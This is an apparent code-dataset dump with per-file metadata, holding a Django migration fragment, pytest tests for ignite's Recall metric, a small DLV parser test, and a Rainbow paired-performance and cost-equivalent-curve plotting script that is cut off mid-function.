field=models.UUIDField(null=True),
),
migrations.AddField(
model_name='statustype',
name='uuid',
field=models.UUIDField(null=True),
),
migrations.AddField(
model_name='tag',
name='uuid',
field=models.UUIDField(null=True),
),
migrations.AlterField(
model_name='machinerequest',
name='uuid',
field=models.CharField(null=True, max_length=36),
),
migrations.AlterField(
model_name='resourcerequest',
name='uuid',
field=models.CharField(null=True, max_length=36),
),
]
| 29.040816 | 61 | 0.510658 | 345 | 4,269 | 6.214493 | 0.171014 | 0.109142 | 0.257463 | 0.302239 | 0.744403 | 0.744403 | 0.744403 | 0.744403 | 0.722948 | 0.722948 | 0 | 0.005885 | 0.363083 | 4,269 | 146 | 62 | 29.239726 | 0.782641 | 0.004919 | 0 | 0.776978 | 0 | 0 | 0.106226 | 0.011169 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.021583 | 0 | 0.043165 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
885698a51ecd161c864ed38d3ee11f132f78738d | 13,677 | py | Python | tests/ignite/metrics/test_recall.py | Acidburn0zzz/ignite | 0ea52729740ddd5e2da543527232ad23b0c9c97f | [
"BSD-3-Clause"
] | 1 | 2018-12-30T04:11:33.000Z | 2018-12-30T04:11:33.000Z | tests/ignite/metrics/test_recall.py | Acidburn0zzz/ignite | 0ea52729740ddd5e2da543527232ad23b0c9c97f | [
"BSD-3-Clause"
] | null | null | null | tests/ignite/metrics/test_recall.py | Acidburn0zzz/ignite | 0ea52729740ddd5e2da543527232ad23b0c9c97f | [
"BSD-3-Clause"
] | null | null | null | import pytest
import warnings
from sklearn.metrics import recall_score
from sklearn.exceptions import UndefinedMetricWarning
from ignite.exceptions import NotComputableError
from ignite.metrics import Recall
import torch
torch.manual_seed(12)
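
# A minimal sketch (not part of the original suite) of the update/compute
# protocol these tests exercise; per the assertions below, binary
# predictions are thresholded at 0.5.
def _example_recall_usage():
    re = Recall(average=True)
    y_pred = torch.rand(10, 1)
    y = torch.randint(0, 2, size=(10,)).type(torch.LongTensor)
    re.update((y_pred, y))
    return re.compute()  # a float when average=True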
def test_no_update():
recall = Recall()
with pytest.raises(NotComputableError):
recall.compute()
def test_binary_wrong_inputs():
re = Recall()
with pytest.raises(ValueError):
# y has not only 0 or 1 values
re.update((torch.randint(0, 2, size=(10,)).type(torch.LongTensor),
torch.arange(0, 10).type(torch.LongTensor)))
# TODO: Uncomment the following after 0.1.2 release
# with pytest.raises(ValueError):
# # y_pred values are not thresholded to 0, 1 values
    #     re.update((torch.rand(10, 1),
# torch.randint(0, 2, size=(10,)).type(torch.LongTensor)))
with pytest.raises(ValueError):
# incompatible shapes
re.update((torch.randint(0, 2, size=(10,)).type(torch.LongTensor),
torch.randint(0, 2, size=(10, 5)).type(torch.LongTensor)))
with pytest.raises(ValueError):
# incompatible shapes
re.update((torch.randint(0, 2, size=(10, 5, 6)).type(torch.LongTensor),
torch.randint(0, 2, size=(10,)).type(torch.LongTensor)))
with pytest.raises(ValueError):
# incompatible shapes
re.update((torch.randint(0, 2, size=(10,)).type(torch.LongTensor),
torch.randint(0, 2, size=(10, 5, 6)).type(torch.LongTensor)))
def test_binary_input_N():
    # Binary recall on input of shape (N, 1) or (N, )
def _test(average):
re = Recall(average=average)
y_pred = torch.rand(10, 1)
y = torch.randint(0, 2, size=(10,)).type(torch.LongTensor)
re.update((y_pred, y))
np_y = y.numpy().ravel()
# np_y_pred = y_pred.numpy().ravel()
np_y_pred = (y_pred.numpy().ravel() > 0.5).astype('int')
assert re._type == 'binary'
assert isinstance(re.compute(), float if average else torch.Tensor)
re_compute = re.compute() if average else re.compute().numpy()
assert recall_score(np_y, np_y_pred, average='binary') == pytest.approx(re_compute)
re.reset()
# TODO: y_pred should be binary after 0.1.2 release
# y_pred = torch.randint(0, 2, size=(10, )).type(torch.LongTensor)
y_pred = torch.rand(10)
y = torch.randint(0, 2, size=(10,)).type(torch.LongTensor)
re.update((y_pred, y))
np_y = y.numpy().ravel()
# np_y_pred = y_pred.numpy().ravel()
np_y_pred = (y_pred.numpy().ravel() > 0.5).astype('int')
assert re._type == 'binary'
assert isinstance(re.compute(), float if average else torch.Tensor)
re_compute = re.compute() if average else re.compute().numpy()
assert recall_score(np_y, np_y_pred, average='binary') == pytest.approx(re_compute)
re.reset()
# TODO: y_pred should be binary after 0.1.2 release
y_pred = torch.Tensor([0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.51])
y = torch.randint(0, 2, size=(10,)).type(torch.LongTensor)
re.update((y_pred, y))
np_y = y.numpy().ravel()
# np_y_pred = y_pred.numpy().ravel()
np_y_pred = (y_pred.numpy().ravel() > 0.5).astype('int')
assert re._type == 'binary'
assert isinstance(re.compute(), float if average else torch.Tensor)
re_compute = re.compute() if average else re.compute().numpy()
assert recall_score(np_y, np_y_pred, average='binary') == pytest.approx(re_compute)
_test(average=True)
_test(average=False)
def test_binary_input_NL():
    # Binary recall on input of shape (N, L)
def _test(average):
re = Recall(average=average)
# TODO: y_pred should be binary after 0.1.2 release
# y_pred = torch.randint(0, 2, size=(10, 5)).type(torch.LongTensor)
y_pred = torch.rand(10, 5)
y = torch.randint(0, 2, size=(10, 5)).type(torch.LongTensor)
re.update((y_pred, y))
np_y = y.numpy().ravel()
# np_y_pred = y_pred.numpy().ravel()
np_y_pred = (y_pred.numpy().ravel() > 0.5).astype('int')
assert re._type == 'binary'
assert isinstance(re.compute(), float if average else torch.Tensor)
        re_compute = re.compute() if average else re.compute().numpy()
        assert recall_score(np_y, np_y_pred, average='binary') == pytest.approx(re_compute)
re.reset()
# TODO: y_pred should be binary after 0.1.2 release
# y_pred = torch.randint(0, 2, size=(10, 1, 5)).type(torch.LongTensor)
y_pred = torch.rand(10, 1, 5)
y = torch.randint(0, 2, size=(10, 1, 5)).type(torch.LongTensor)
re.update((y_pred, y))
np_y = y.numpy().ravel()
# np_y_pred = y_pred.numpy().ravel()
np_y_pred = (y_pred.numpy().ravel() > 0.5).astype('int')
assert re._type == 'binary'
assert isinstance(re.compute(), float if average else torch.Tensor)
        re_compute = re.compute() if average else re.compute().numpy()
        assert recall_score(np_y, np_y_pred, average='binary') == pytest.approx(re_compute)
_test(average=True)
_test(average=False)
def test_binary_input_NHW():
    # Binary recall on input of shape (N, H, W)
def _test(average):
re = Recall(average=average)
# TODO: y_pred should be binary after 0.1.2 release
# y_pred = torch.randint(0, 2, size=(10, 12, 10)).type(torch.LongTensor)
y_pred = torch.rand(10, 12, 10)
y = torch.randint(0, 2, size=(10, 12, 10)).type(torch.LongTensor)
re.update((y_pred, y))
np_y = y.numpy().ravel()
# np_y_pred = y_pred.numpy().ravel()
np_y_pred = (y_pred.numpy().ravel() > 0.5).astype('int')
assert re._type == 'binary'
assert isinstance(re.compute(), float if average else torch.Tensor)
re_compute = re.compute() if average else re.compute().numpy()
assert recall_score(np_y, np_y_pred, average='binary') == pytest.approx(re_compute)
re.reset()
# TODO: y_pred should be binary after 0.1.2 release
# y_pred = torch.randint(0, 2, size=(10, 1, 12, 10)).type(torch.LongTensor)
y_pred = torch.rand(10, 1, 12, 10)
y = torch.randint(0, 2, size=(10, 1, 12, 10)).type(torch.LongTensor)
re.update((y_pred, y))
np_y = y.numpy().ravel()
# np_y_pred = y_pred.numpy().ravel()
np_y_pred = (y_pred.numpy().ravel() > 0.5).astype('int')
assert re._type == 'binary'
assert isinstance(re.compute(), float if average else torch.Tensor)
re_compute = re.compute() if average else re.compute().numpy()
assert recall_score(np_y, np_y_pred, average='binary') == pytest.approx(re_compute)
_test(average=True)
_test(average=False)
def test_multiclass_wrong_inputs():
re = Recall()
with pytest.raises(ValueError):
# incompatible shapes
re.update((torch.rand(10, 5, 4), torch.randint(0, 2, size=(10,)).type(torch.LongTensor)))
with pytest.raises(ValueError):
# incompatible shapes
re.update((torch.rand(10, 5, 6), torch.randint(0, 5, size=(10, 5)).type(torch.LongTensor)))
with pytest.raises(ValueError):
# incompatible shapes
re.update((torch.rand(10), torch.randint(0, 5, size=(10, 5, 6)).type(torch.LongTensor)))
def test_multiclass_input_N():
# Multiclass input data of shape (N, ) and (N, C)
def _test(average):
re = Recall(average=average)
y_pred = torch.rand(20, 6)
y = torch.randint(0, 5, size=(20,)).type(torch.LongTensor)
re.update((y_pred, y))
np_y_pred = y_pred.numpy().argmax(axis=1).ravel()
np_y = y.numpy().ravel()
assert re._type == 'multiclass'
assert isinstance(re.compute(), float if average else torch.Tensor)
re_compute = re.compute() if average else re.compute().numpy()
sklearn_average_parameter = 'macro' if average else None
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=UndefinedMetricWarning)
assert recall_score(np_y, np_y_pred, average=sklearn_average_parameter) == pytest.approx(re_compute)
re.reset()
y_pred = torch.rand(10, 4)
y = torch.randint(0, 3, size=(10, 1)).type(torch.LongTensor)
re.update((y_pred, y))
np_y_pred = y_pred.numpy().argmax(axis=1).ravel()
np_y = y.numpy().ravel()
assert re._type == 'multiclass'
assert isinstance(re.compute(), float if average else torch.Tensor)
re_compute = re.compute() if average else re.compute().numpy()
sklearn_average_parameter = 'macro' if average else None
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=UndefinedMetricWarning)
assert recall_score(np_y, np_y_pred, average=sklearn_average_parameter) == pytest.approx(re_compute)
# 2-classes
re.reset()
y_pred = torch.rand(10, 2)
y = torch.randint(0, 2, size=(10, 1)).type(torch.LongTensor)
re.update((y_pred, y))
np_y_pred = y_pred.numpy().argmax(axis=1).ravel()
np_y = y.numpy().ravel()
assert re._type == 'multiclass'
assert isinstance(re.compute(), float if average else torch.Tensor)
re_compute = re.compute() if average else re.compute().numpy()
sklearn_average_parameter = 'macro' if average else None
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=UndefinedMetricWarning)
assert recall_score(np_y, np_y_pred, average=sklearn_average_parameter) == pytest.approx(re_compute)
_test(average=True)
_test(average=False)
def test_multiclass_input_NL():
# Multiclass input data of shape (N, L) and (N, C, L)
def _test(average):
re = Recall(average=average)
y_pred = torch.rand(10, 5, 8)
y = torch.randint(0, 4, size=(10, 8)).type(torch.LongTensor)
re.update((y_pred, y))
np_y_pred = y_pred.numpy().argmax(axis=1).ravel()
np_y = y.numpy().ravel()
assert re._type == 'multiclass'
assert isinstance(re.compute(), float if average else torch.Tensor)
re_compute = re.compute() if average else re.compute().numpy()
sklearn_average_parameter = 'macro' if average else None
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=UndefinedMetricWarning)
assert recall_score(np_y, np_y_pred, average=sklearn_average_parameter) == pytest.approx(re_compute)
re.reset()
y_pred = torch.rand(15, 10, 8)
y = torch.randint(0, 9, size=(15, 8)).type(torch.LongTensor)
re.update((y_pred, y))
np_y_pred = y_pred.numpy().argmax(axis=1).ravel()
np_y = y.numpy().ravel()
assert re._type == 'multiclass'
assert isinstance(re.compute(), float if average else torch.Tensor)
re_compute = re.compute() if average else re.compute().numpy()
sklearn_average_parameter = 'macro' if average else None
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=UndefinedMetricWarning)
assert recall_score(np_y, np_y_pred, average=sklearn_average_parameter) == pytest.approx(re_compute)
_test(average=True)
_test(average=False)
def test_multiclass_input_NHW():
# Multiclass input data of shape (N, H, W, ...) and (N, C, H, W, ...)
def _test(average):
re = Recall(average=average)
y_pred = torch.rand(10, 5, 18, 16)
y = torch.randint(0, 4, size=(10, 18, 16)).type(torch.LongTensor)
re.update((y_pred, y))
np_y_pred = y_pred.numpy().argmax(axis=1).ravel()
np_y = y.numpy().ravel()
assert re._type == 'multiclass'
assert isinstance(re.compute(), float if average else torch.Tensor)
re_compute = re.compute() if average else re.compute().numpy()
sklearn_average_parameter = 'macro' if average else None
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=UndefinedMetricWarning)
assert recall_score(np_y, np_y_pred, average=sklearn_average_parameter) == pytest.approx(re_compute)
re.reset()
y_pred = torch.rand(10, 7, 20, 12)
y = torch.randint(0, 6, size=(10, 20, 12)).type(torch.LongTensor)
re.update((y_pred, y))
np_y_pred = y_pred.numpy().argmax(axis=1).ravel()
np_y = y.numpy().ravel()
assert re._type == 'multiclass'
assert isinstance(re.compute(), float if average else torch.Tensor)
re_compute = re.compute() if average else re.compute().numpy()
sklearn_average_parameter = 'macro' if average else None
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=UndefinedMetricWarning)
assert recall_score(np_y, np_y_pred, average=sklearn_average_parameter) == pytest.approx(re_compute)
_test(average=True)
_test(average=False)
def test_incorrect_type():
    # Tests that changing the input type during training raises an error
def _test(average):
re = Recall(average=average)
y_pred = torch.softmax(torch.rand(4, 4), dim=1)
y = torch.ones(4).type(torch.LongTensor)
re.update((y_pred, y))
y_pred = torch.rand(4, 1)
y = torch.ones(4).type(torch.LongTensor)
with pytest.raises(RuntimeError):
re.update((y_pred, y))
_test(average=True)
_test(average=False)
| 41.320242 | 112 | 0.62755 | 1,925 | 13,677 | 4.30026 | 0.062857 | 0.060401 | 0.026818 | 0.037207 | 0.919063 | 0.907828 | 0.892245 | 0.8705 | 0.851051 | 0.836072 | 0 | 0.029974 | 0.23163 | 13,677 | 330 | 113 | 41.445455 | 0.757731 | 0.119324 | 0 | 0.753247 | 0 | 0 | 0.020991 | 0 | 0 | 0 | 0 | 0.00303 | 0.181818 | 1 | 0.073593 | false | 0 | 0.030303 | 0 | 0.103896 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
88723aae2a80d045dbecfd3d0253bc2aeef7bb16 | 133 | py | Python | tests/parser/bug.72.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | tests/parser/bug.72.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | tests/parser/bug.72.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | input = """
%#maxint=65535.
p :- a. %#int(X), a.
a | na.
"""
output = """
%#maxint=65535.
p :- a. %#int(X), a.
a | na.
"""
| 10.230769 | 21 | 0.398496 | 20 | 133 | 2.65 | 0.45 | 0.415094 | 0.45283 | 0.490566 | 0.792453 | 0.792453 | 0.792453 | 0.792453 | 0.792453 | 0 | 0 | 0.103093 | 0.270677 | 133 | 12 | 22 | 11.083333 | 0.443299 | 0 | 0 | 0.8 | 0 | 0 | 0.752 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
ee38616d72b76e41cade341c553c5270e1f213e0 | 60,249 | py | Python | bin/create-multi-experiment-figures.py | allenai/rainbow | 045d726355364b7495fa2e72bb05316545a5f2b0 | [
"Apache-2.0"
] | 50 | 2021-02-05T17:26:38.000Z | 2022-03-10T13:46:44.000Z | bin/create-multi-experiment-figures.py | allenai/rainbow | 045d726355364b7495fa2e72bb05316545a5f2b0 | [
"Apache-2.0"
] | 5 | 2021-04-04T15:57:33.000Z | 2022-02-10T05:47:30.000Z | bin/create-multi-experiment-figures.py | allenai/rainbow | 045d726355364b7495fa2e72bb05316545a5f2b0 | [
"Apache-2.0"
] | 4 | 2021-04-08T15:41:40.000Z | 2021-08-22T09:55:34.000Z | #! /usr/bin/env python
"""Create multi-experiment figures for the Rainbow results."""
import dataclasses
import functools
import logging
import operator
import os
from typing import Any, Callable, Dict, List, Optional, Tuple
import click
from matplotlib import pyplot as plt
import numpy as np
import pandas as pd
from sklearn.isotonic import IsotonicRegression
import tqdm
from rainbow import settings, utils
logger = logging.getLogger(__name__)
# constants
N_TO_ROWS_AND_COLS = {
1: (1, 1),
2: (1, 2),
3: (1, 3),
4: (2, 2),
5: (2, 3),
6: (2, 3),
7: (4, 2),
8: (4, 2),
9: (3, 3),
10: (4, 3),
11: (4, 3),
12: (4, 3),
13: (4, 4),
14: (4, 4),
15: (3, 5),
16: (4, 4),
}
"""A mapping from various integers to a number of rows and columns.
This mapping is helpful for creating figures with multiple subfigures
when there's no obvious number of rows and columns.
"""
CENTERLINE_STYLE_KWARGS = {"c": "0.10", "linestyle": ":"}
"""Key-word arguments for styling the y = x lines in the plots."""
LINESTYLES = ["-", "--", "-.", ":"]
"""Line styles to use in the figures."""
# helper functions
def _make_plot_grid(
plot_func: Callable,
x_label: str,
y_label: str,
control_data: pd.DataFrame,
treatment_data: pd.DataFrame,
score_col: str,
match_col: str,
match_fmt: Optional[Callable],
group_col: Optional[str],
group_fmt: Optional[Callable],
group_order: Optional[Callable],
subfigure_col: Optional[str],
subfigure_fmt: Optional[Callable],
subfigure_order: Optional[Callable],
) -> Tuple[plt.Figure, plt.Axes]:
"""Return the grid of plots.
Parameters
----------
plot_func : Callable, required
A function taking the ``group_to_data`` dictionary and an ``ax``
axis object.
x_label : str, required
The label for the x-axis (control).
y_label : str, required
The label for the y-axis (treatment).
control_data : pd.DataFrame, required
The data for the control.
treatment_data : pd.DataFrame, required
The data for the treatments.
score_col : str, required
The name of the column containing the score.
match_col : str, required
The column to use for matching control and treatment scores
together.
match_fmt : Optional[Callable], required
A function to apply to the match column.
group_col : Optional[str], required
The column to use as a key for coloring the points, which will
be labeled in the legend (e.g. the treatments).
group_fmt : Optional[Callable], required
A function to format group labels for the legend.
group_order : Optional[Callable], required
A function to be called as a sort key when ordering the groups.
subfigure_col : Optional[str], required
The column to use to split the figure up into subfigures.
subfigure_fmt : Optional[Callable], required
A function to format the title for each subfigure.
subfigure_order : Optional[Callable], required
A function to be called as a sort key when ordering the
subfigures.
Returns
-------
Tuple[plt.Figure, np.ndarray[plt.Axes]]
A tuple containing the figure and its axes.
"""
# Replace null function arguments with the identity.
def identity(x):
return x
match_fmt = match_fmt or identity
group_fmt = group_fmt or identity
group_order = group_order or identity
subfigure_fmt = subfigure_fmt or identity
subfigure_order = subfigure_order or identity
# Construct important constants.
groups = (
sorted(treatment_data[group_col].unique(), key=group_order)
if group_col is not None
else [None]
)
subfigures = (
sorted(treatment_data[subfigure_col].unique(), key=subfigure_order)
if subfigure_col is not None
else [None]
)
n_rows, n_cols = N_TO_ROWS_AND_COLS[len(subfigures)]
# Initialize the figure.
fig, axes = plt.subplots(
nrows=n_rows,
ncols=n_cols,
figsize=(4 * n_cols, 4 * n_rows),
constrained_layout=True,
)
# Modify axes so we can access the axis objects in a uniform way,
# regardless of the number of rows or columns.
if not isinstance(axes, np.ndarray):
axes = np.array([axes])
axes = axes.reshape(n_rows, n_cols)
# Plot the subfigures.
for i, subfigure in enumerate(subfigures):
control_subdata = (
control_data[control_data[subfigure_col] == subfigure]
if subfigure_col is not None
else control_data
)
treatment_subdata = (
treatment_data[treatment_data[subfigure_col] == subfigure]
if subfigure_col is not None
else treatment_data
)
# Compute the data to plot for each group.
group_to_data = {}
for group in groups:
# Join the treatment and control data for the group.
pairs = pd.merge(
treatment_subdata[treatment_subdata[group_col] == group]
if group_col is not None
else treatment_subdata,
control_subdata,
how="left",
on=match_col,
suffixes=("_treatment", "_control"),
)
group_to_data[group_fmt(group)] = {
"matches": pairs[match_col].apply(match_fmt).values,
"control_scores": pairs[f"{score_col}_control"].values,
"treatment_scores": pairs[f"{score_col}_treatment"].values,
}
plot_func(
group_to_data=group_to_data, ax=axes[i // n_cols][i % n_cols],
)
# Display the legend.
axes[i // n_cols][i % n_cols].legend()
# Set the subfigure's title.
axes[i // n_cols][i % n_cols].set_title(subfigure_fmt(subfigure))
for i in range(n_cols):
axes[-1][i].set_xlabel(x_label)
for i in range(n_rows):
axes[i][0].set_ylabel(y_label)
return fig, axes
def plot_paired_performance(
control_data: pd.DataFrame,
treatment_data: pd.DataFrame,
score_col: str,
match_col: str,
match_fmt: Optional[Callable],
group_col: Optional[str],
group_fmt: Optional[Callable],
group_order: Optional[Callable],
subfigure_col: Optional[str],
subfigure_fmt: Optional[Callable],
subfigure_order: Optional[Callable],
) -> Tuple[plt.Figure, plt.Axes]:
"""Return the paired performance plot.
Parameters
----------
control_data : pd.DataFrame, required
The data for the controls.
treatment_data : pd.DataFrame, required
The data for the treatments.
score_col : str, required
The name of the column containing the score.
match_col : str, required
The column to use for matching control and treatment scores
together (e.g., the task).
match_fmt : Optional[Callable], required
A function to apply to the match column.
group_col : Optional[str], required
The column to use as a key for coloring the points, which will
be labeled in the legend (e.g. the treatments).
group_fmt : Optional[Callable], required
A function to format group labels for the legend.
group_order : Optional[Callable], required
A function to be called as a sort key when ordering the groups.
subfigure_col : Optional[str], required
The column to use to split the figure up into subfigures.
    subfigure_fmt : Optional[Callable], required
A function to format the title for each subfigure.
subfigure_order : Optional[Callable], required
A function to be called as a sort key when ordering the
subfigures.
Returns
-------
Tuple[plt.Figure, np.ndarray[plt.Axes]]
A tuple containing the figure and its axes.
"""
def plot_func(group_to_data, ax):
for group, data in group_to_data.items():
matches = data["matches"]
control_scores = data["control_scores"]
treatment_scores = data["treatment_scores"]
ax.scatter(control_scores, treatment_scores, label=group)
for match, x, y in zip(matches, control_scores, treatment_scores):
ax.annotate(match, (x, y))
# Scale the x and y limits
min_score = min(
min(data["treatment_scores"].min(), data["control_scores"].min())
for data in group_to_data.values()
)
max_score = max(
max(data["treatment_scores"].max(), data["control_scores"].max())
for data in group_to_data.values()
)
ax.set_xlim(0.99 * min_score, 1.01 * max_score)
ax.set_ylim(0.99 * min_score, 1.01 * max_score)
# Plot the y = x line.
ax.plot(
[0.99 * min_score, 1.01 * max_score],
[0.99 * min_score, 1.01 * max_score],
**CENTERLINE_STYLE_KWARGS,
)
return _make_plot_grid(
plot_func=plot_func,
x_label="control score (accuracy)",
y_label="treatment score (accuracy)",
control_data=control_data,
treatment_data=treatment_data,
score_col=score_col,
match_col=match_col,
match_fmt=match_fmt,
group_col=group_col,
group_fmt=group_fmt,
group_order=group_order,
subfigure_col=subfigure_col,
subfigure_fmt=subfigure_fmt,
subfigure_order=subfigure_order,
)
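
# A minimal, self-contained sketch of invoking ``plot_paired_performance``.
# The tasks, scores, and transfer methods below are made up for
# illustration; they are not results from the experiments.
def _example_paired_performance():
    control = pd.DataFrame(
        {"task": ["anli", "socialiqa"], "best_score": [0.70, 0.65]}
    )
    treatment = pd.DataFrame(
        {
            "task": ["anli", "socialiqa"] * 2,
            "transfer_method": ["multi-task"] * 2
            + ["sequential-fine-tune"] * 2,
            "best_score": [0.72, 0.68, 0.71, 0.66],
        }
    )
    return plot_paired_performance(
        control_data=control,
        treatment_data=treatment,
        score_col="best_score",
        match_col="task",
        match_fmt=None,
        group_col="transfer_method",
        group_fmt=None,
        group_order=None,
        subfigure_col=None,
        subfigure_fmt=None,
        subfigure_order=None,
    )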
def plot_cost_equivalent_curves(
control_data: pd.DataFrame,
treatment_data: pd.DataFrame,
score_col: str,
match_col: str,
match_fmt: Optional[Callable],
group_col: Optional[str],
group_fmt: Optional[Callable],
group_order: Optional[Callable],
subfigure_col: Optional[str],
subfigure_fmt: Optional[Callable],
subfigure_order: Optional[Callable],
) -> Tuple[plt.Figure, plt.Axes]:
"""Return the cost equivalent curve plot.
Parameters
----------
control_data : pd.DataFrame, required
The data for the control.
treatment_data : pd.DataFrame, required
The data for the treatments.
score_col : str, required
The name of the column containing the score.
match_col : str, required
The column to use for matching control and treatment scores
together (e.g., the training data size).
match_fmt : Optional[Callable], required
Unused.
group_col : Optional[str], required
The column to use as a key for coloring the points, which will
be labeled in the legend (e.g. the treatments).
group_fmt : Optional[Callable], required
A function to format group labels for the legend.
group_order : Optional[Callable], required
A function to be called as a sort key when ordering the groups.
subfigure_col : Optional[str], required
The column to use to split the figure up into subfigures.
    subfigure_fmt : Optional[Callable], required
A function to format the title for each subfigure.
subfigure_order : Optional[Callable], required
A function to be called as a sort key when ordering the
subfigures.
Returns
-------
Tuple[plt.Figure, np.ndarray[plt.Axes]]
A tuple containing the figure and its axes.
"""
def plot_func(group_to_data, ax):
for i, (group, data) in enumerate(group_to_data.items()):
matches = data["matches"]
control_scores = data["control_scores"]
treatment_scores = data["treatment_scores"]
            # Fit isotonic curves for the control and treatment learning
            # curves, as well as the treatment curve's inverse.
min_size = matches.min()
max_size = matches.max()
xs = np.linspace(min_size, max_size, num=2500)
control_smoother = IsotonicRegression(out_of_bounds="clip").fit(
matches, control_scores
)
treatment_smoother = IsotonicRegression(out_of_bounds="clip").fit(
matches, treatment_scores
)
treatment_smoother_inv = IsotonicRegression(
out_of_bounds="clip"
).fit(treatment_smoother.predict(xs), xs)
# Plot the cost equivalent curve.
ax.plot(
xs,
treatment_smoother_inv.predict(control_smoother.predict(xs)),
linestyle=LINESTYLES[i],
label=group,
)
# Plot the original data points after smoothing, since we
# can't align them without smoothing.
ax.scatter(
matches,
treatment_smoother_inv.predict(
control_smoother.predict(matches)
),
c="k",
s=8,
)
# Scale the x and y limits
ax.set_xlim(0.99 * min_size, 1.01 * max_size)
ax.set_ylim(0.99 * min_size, 1.01 * max_size)
# Plot the y = x line.
ax.plot(
[0.99 * min_size, 1.01 * max_size],
[0.99 * min_size, 1.01 * max_size],
**CENTERLINE_STYLE_KWARGS,
)
# Set the x and y ticks.
ticks = np.linspace(min_size, max_size, num=5)[1:]
tick_labels = [
f"{x/1000:.1f}".rstrip("0").rstrip(".") + "k"
if x / 1000 > 1.0
else f"{x:f}"
for x in ticks
]
ax.set_xticks(ticks)
ax.set_xticklabels(tick_labels)
ax.set_yticks(ticks)
ax.set_yticklabels(tick_labels)
# Add the second axis at the top of the figure.
def cost2perf(x):
if len(x) == 0:
return x
return control_smoother.predict(x.reshape(-1)).tolist()
ax2 = ax.twiny()
ax2.set_xlim(ax.get_xlim())
ax2.set_xticks(ticks)
ax2.set_xticklabels([f"{x:.3f}" for x in cost2perf(ticks)])
return _make_plot_grid(
plot_func=plot_func,
x_label="baseline examples",
y_label="new method examples",
control_data=control_data,
treatment_data=treatment_data,
score_col=score_col,
match_col=match_col,
match_fmt=None,
group_col=group_col,
group_fmt=group_fmt,
group_order=group_order,
subfigure_col=subfigure_col,
subfigure_fmt=subfigure_fmt,
subfigure_order=subfigure_order,
)
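
# The core of the cost equivalent curve as a standalone sketch: fit isotonic
# learning curves to control and treatment, invert the treatment curve, and
# map each control budget to the treatment budget reaching the same score.
# The sizes and scores below are synthetic.
def _example_cost_equivalent():
    sizes = np.array([100, 400, 1600, 6400, 16000])
    control_scores = np.array([0.55, 0.62, 0.68, 0.72, 0.74])
    treatment_scores = np.array([0.60, 0.66, 0.71, 0.74, 0.76])
    xs = np.linspace(sizes.min(), sizes.max(), num=2500)
    control = IsotonicRegression(out_of_bounds="clip").fit(
        sizes, control_scores
    )
    treatment = IsotonicRegression(out_of_bounds="clip").fit(
        sizes, treatment_scores
    )
    treatment_inv = IsotonicRegression(out_of_bounds="clip").fit(
        treatment.predict(xs), xs
    )
    # Treatment examples needed to match a control model at each size.
    return treatment_inv.predict(control.predict(sizes))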
def plot_performance_equivalent_curves(
control_data: pd.DataFrame,
treatment_data: pd.DataFrame,
score_col: str,
match_col: str,
match_fmt: Optional[Callable],
group_col: Optional[str],
group_fmt: Optional[Callable],
group_order: Optional[Callable],
subfigure_col: Optional[str],
subfigure_fmt: Optional[Callable],
subfigure_order: Optional[Callable],
) -> Tuple[plt.Figure, plt.Axes]:
"""Return the performance equivalent curve plot.
Parameters
----------
control_data : pd.DataFrame, required
The data for the controls.
treatment_data : pd.DataFrame, required
The data for the treatments.
score_col : str, required
The name of the column containing the score.
match_col : str, required
The column to use for matching control and treatment scores
together (e.g., the size).
match_fmt : Optional[Callable], required
Unused.
group_col : Optional[str], required
The column to use as a key for coloring the points, which will
be labeled in the legend (e.g. the treatments).
group_fmt : Optional[Callable], required
A function to format group labels for the legend.
group_order : Optional[Callable], required
A function to be called as a sort key when ordering the groups.
subfigure_col : Optional[str], required
The column to use to split the figure up into subfigures.
    subfigure_fmt : Optional[Callable], required
A function to format the title for each subfigure.
subfigure_order : Optional[Callable], required
A function to be called as a sort key when ordering the
subfigures.
Returns
-------
Tuple[plt.Figure, np.ndarray[plt.Axes]]
A tuple containing the figure and its axes.
"""
def plot_func(group_to_data, ax):
for i, (group, data) in enumerate(group_to_data.items()):
matches = data["matches"]
control_scores = data["control_scores"]
treatment_scores = data["treatment_scores"]
            # Fit isotonic curves for the control and treatment learning
            # curves, as well as the control curve's inverse.
min_size = matches.min()
max_size = matches.max()
xs = np.linspace(min_size, max_size, num=2500)
control_smoother = IsotonicRegression(out_of_bounds="clip").fit(
matches, control_scores
)
control_smoother_inv = IsotonicRegression(out_of_bounds="clip").fit(
control_smoother.predict(xs), xs
)
treatment_smoother = IsotonicRegression(out_of_bounds="clip").fit(
matches, treatment_scores
)
# Plot the performance equivalent curve.
ax.plot(
control_smoother.predict(xs),
treatment_smoother.predict(xs),
linestyle=LINESTYLES[i],
label=group,
)
# Plot the original data points without smoothing, since
# they're already aligned (i.e., trained on the same amount
